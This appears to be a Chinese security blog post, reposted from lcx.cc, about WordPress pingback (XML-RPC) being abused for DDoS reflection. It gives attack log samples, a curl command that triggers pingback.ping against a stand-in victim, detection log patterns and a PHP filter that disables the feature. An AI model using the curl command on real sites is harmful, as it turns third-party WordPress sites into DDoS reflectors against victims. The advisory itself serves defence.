任何开启了Pingback(默认就开启)的WordPress的站点可以被用来做DDOS攻击其它服务器。
看如下日志:
74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com" 121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" ..
可以发现每次请求还增加了随机数/?3162504=9747583以此来绕过缓存。
测试这种攻击方式只需要一个curl命令就可以了:
$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d '' pingback.ping http://victim.com www.anywordpresssite.com/postchosen
想要看你自己的网站是否被用来做了攻击可以查看日志当中是否包含类似如下的内容:
93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:x0Ax0A x0A" 94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:x0Ax0Apingback.pingx0Ax0A x0A x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899x0A x0A x0A x0A x0A yoursite.comx0A x0A x0Ax0Ax0A"pingback.ping x0Ax0A x0A x0Ax0A x0A x0A x0Ahttp://fastbet99.com/?1698491=8940641 x0Ax0A x0A x0Ayoursite.com x0A
防御此问题的推荐方法需要屏蔽 XML-RPC (pingback) 的功能,WordPress主题中添加如下代码:
add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['pingback.ping'] ); return $methods; } );
相关内容:
Bitcoin startup BIPS loses $1 million after DDoS heist
迅雷云你伤不起啊,利用迅雷云资源绑架用户,发起大型DDOS攻击
US-CERT:DNS服务器配置不当是上周300G DDoS的元凶
电磁风暴超暴力 PHP DDOS 攻击工具 & PHP DDOS 攻击 - 编年史
美国热炒解放军网络战能力 国产神器!军工级暴力DDOS攻击系统!
男子转嫁黑客攻击致金盾网瘫痪 被DDOS请勿乱指域名到政府网
Linux 系统下 DDOS 工具 tfn2k 攻击原理详解
DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击
留言评论(旧系统):
文章来源于lcx.cc:超过16W的WordPress网站被用来做DDoS攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论